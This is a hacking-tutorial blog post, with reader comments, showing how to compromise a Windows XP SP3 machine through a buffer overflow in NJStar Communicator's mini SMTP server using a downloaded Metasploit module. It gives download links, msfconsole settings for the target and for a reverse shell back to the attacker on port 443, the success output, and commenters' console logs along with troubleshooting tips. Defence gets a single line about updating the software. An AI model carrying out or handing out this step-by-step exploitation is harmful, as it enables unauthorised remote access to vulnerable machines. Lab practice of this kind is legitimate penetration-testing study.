• 27,004
  • +1,029
  • 3,074
Hacking Windows XP SP3 via NJStar 300 Communicator Mini SMTP Server Vulnerability

Hacking Windows XP SP3 via NJStar 300 Communicator Mini SMTP Server Vulnerability

Bookmark

Type : Tutorial

Level : Medium

Attacker O.S : Backtrack 5R1

Victim O.S : Windows XP SP3

Exploit Credit : Dillon Beresford

When I see this exploit 2 weeks ago I'm thinking why I never know about this software before?Because inside China itself, the most popular software for writing a Chinese character was Sogou. Maybe it's because this NJStar have English version so this software should be more popular for users outside China where they just start learn about Chinese Hanzi characters ๐Ÿ™‚

This software also have a mini SMTP server to sending an e-mail, so just one click you can send an e-mail to every destination you want.

So how the exploit works?

According to metasploit.com this exploit will exploiting minismtp.exe because this is the only one NJStar component in memory and it's base starts with a 0x00.

Requirements :

1. NJstar 300 Communicator Mini SMTP Server application (download link)

Mediafire.com

2. NJstar SMTP Exploit

Mediafire.com

Step by Step :

Attacker IP Address : 192.168.8.93

Victim IP Address : 192.168.8.94

1. Download the required file above(the application and exploit).

– Install the vulnerable application on your Windows XP SP3 machine.

– Copy the NJStar SMTP Exploit into your attacker machine and put in /pentest/exploits/framework/modules/exploits/windows/smtp/ (FYI : this location depends on where you install your metasploit framework especially for Windows user)

2. Open your terminal(CTRL+ALT+T) and run metasploit console by typing msfconsole, then use the exploit we've just added before and do not forget do describe the payload also.

Hacking Windows XP SP3 via NJStar 300 Communicator Mini SMTP Server Vulnerability

3. You can view the available switch by typing show options command from your msfconsole. In the picture below was my switch configuration to make the exploit works.

Hacking Windows XP SP3 via NJStar 300 Communicator Mini SMTP Server Vulnerability

Information :

msf  exploit(njstar_smtp_bof) > set rhost 192.168.8.94 --> set the target IP Address
rhost => 192.168.8.94
msf  exploit(njstar_smtp_bof) > set lhost 192.168.8.93 --> set attacker IP Address to handle connection when exploit success
lhost => 192.168.8.93
msf  exploit(njstar_smtp_bof) > set lport 443 --> attacker local port to handle connection
lport => 443
msf  exploit(njstar_smtp_bof) > set target 0 --> set the target to windows xp sp2/sp3
target => 0

4. When everything has been set up nicely, now let's try the exploit is it works or not by running exploit command from your msfconsole.

Hacking Windows XP SP3 via NJStar 300 Communicator Mini SMTP Server Vulnerability

Pwn3D!!

Countermeasures :

1. Update your NJStar Communicator to the latest version.

Hope it's useful ๐Ÿ™‚

Subscribe Now To Get Latest Hacking Tutorial on Your E-Mail

Share this article if you found this post was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com

  • toooottooo

    [*] Started reverse handler on 192.168.1.2:4444
    [*] Trying target Windows XP SP2/SP3…
    [*] Sending the egg…
    [*] Sending our buffer containing the egg hunter…
    he dont working plzz help me ;(

    • v4L

      #toooottooo
      how about the target os you use? this exploit only work for windows XP SP2 or XP SP3.
      and also how about the firewall installed on target machine?maybe the firewall blocked it.

  • chrisk_44

    msf exploit(njstar_smtp_bof) > exploit [*] Started reverse handler on 192.168.0.99:443 [*] Trying target Windows XP SP2/SP3… [*] Sending the egg… [*] Sending our buffer containing the egg hunter… msf exploit(njstar_smtp_bof) > It stops there. I’m trying to attack a Windows XP SP3 system. The firewall on the Windows system and on my system is turned off. I also Disabled the Antivirus firewall (ESET NOD32 Smart Security Personal Firewall) on the remote computer. What should I do?

    Read more : http://www./hacking-tutorial/hacking-windows-xp-sp3-via-njstar-300-communicator-mini-smtp-server-vulnerability/